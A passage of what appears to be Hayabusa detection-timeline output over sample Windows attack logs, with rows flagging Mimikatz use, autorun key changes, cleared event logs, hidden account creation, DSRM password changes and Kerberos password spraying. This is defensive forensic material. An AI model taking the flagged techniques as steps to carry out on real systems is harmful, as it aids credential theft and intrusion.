Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:35.886 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:35.913 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:35.913 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""\\tsclient\c\temp\stack\a.exe"" : Path: \\tsclient\c\temp\stack\a.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:58.942 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:58.942 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-11 22:21:11.693 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:11.693 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:17.514 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:17.514 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:18.640 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:18.640 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-12 02:16:42.576 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx +2020-07-12 02:16:42.592 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral 
Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx +2020-07-12 02:16:50.984 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx +2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx +2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx +2020-07-12 02:18:01.228 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx +2020-07-12 06:38:17.351 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:1 TaskName:\\smbservice 
timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- +2020-07-12 06:38:17.445 +09:00,fs02.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx +2020-07-12 06:49:56.318 +09:00,fs02.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx +2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,medium,Local user account created,User: admin-kriss : SID:S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-4726 Fast created-deleted user.evtx +2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,medium,Local user account created,User: admin-kriss : SID:S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Admin like user created.evtx +2020-07-12 14:12:58.295 +09:00,jump01.offsec.lan,4720,medium,Local user account created,User: hacking-local-acct : SID:S-1-5-21-1470532092-3758209836-3742276719-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Local user created.evtx +2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,User added to local Administrators group,User: - : SID: 
S-1-5-21-1470532092-3758209836-3742276719-1001 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-User added to local admin groups.evtx +2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-1470532092-3758209836-3742276719-1001 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-4733-Quick added-removed user from local group.evtx +2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=lambda-user,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1158 : Group: Group02",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx +2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=lambda-user,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1158 : Group: Group02 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx +2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: 
S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group01",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group01 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group02",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group02 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: 
CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group03",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group03 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group04",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group04 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.570 
+09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group05",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group05 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group06",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group06 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive 
account group membership change.evtx +2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group07",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group07 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group08",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group08 : Subject user: lambda-user : Subject domain: 
OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group09",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group09 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group10",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : 
Group: Group10 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group11",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group11 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:27:05.579 +09:00,fs02.offsec.lan,4825,medium,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx +2020-07-12 14:28:26.831 +09:00,fs02.offsec.lan,4825,medium,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx +2020-07-12 15:01:13.758 
+09:00,rootdc1.offsec.lan,4728,high,User added to local Domain Admins group,"User: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalDomainAdminsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx +2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,User added to the global Domain Admins group,"Member added: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalDomainAdmins.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx +2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx +2020-07-13 04:45:00.670 +09:00,rootdc1.offsec.lan,4720,high,Hidden user account created! 
(Possible Backdoor),User: FAKE-COMPUTER$ : SID:S-1-5-21-4230534742-2542757381-3142984815-1168,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx +2020-07-13 17:34:33.915 +09:00,rootdc1.offsec.lan,4794,high,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4794-4688-DSRM password set with NTDSutil.evtx +2020-07-19 22:06:52.199 +09:00,01566s-win16-ir.threebeesco.com,5145,critical,Protected Storage Service Access,,rules/sigma/builtin/security/win_protected_storage_service_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_protectedstorage_5145_rpc_masterkey.evtx +2020-07-23 05:29:27.321 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: HD01 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: admin : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
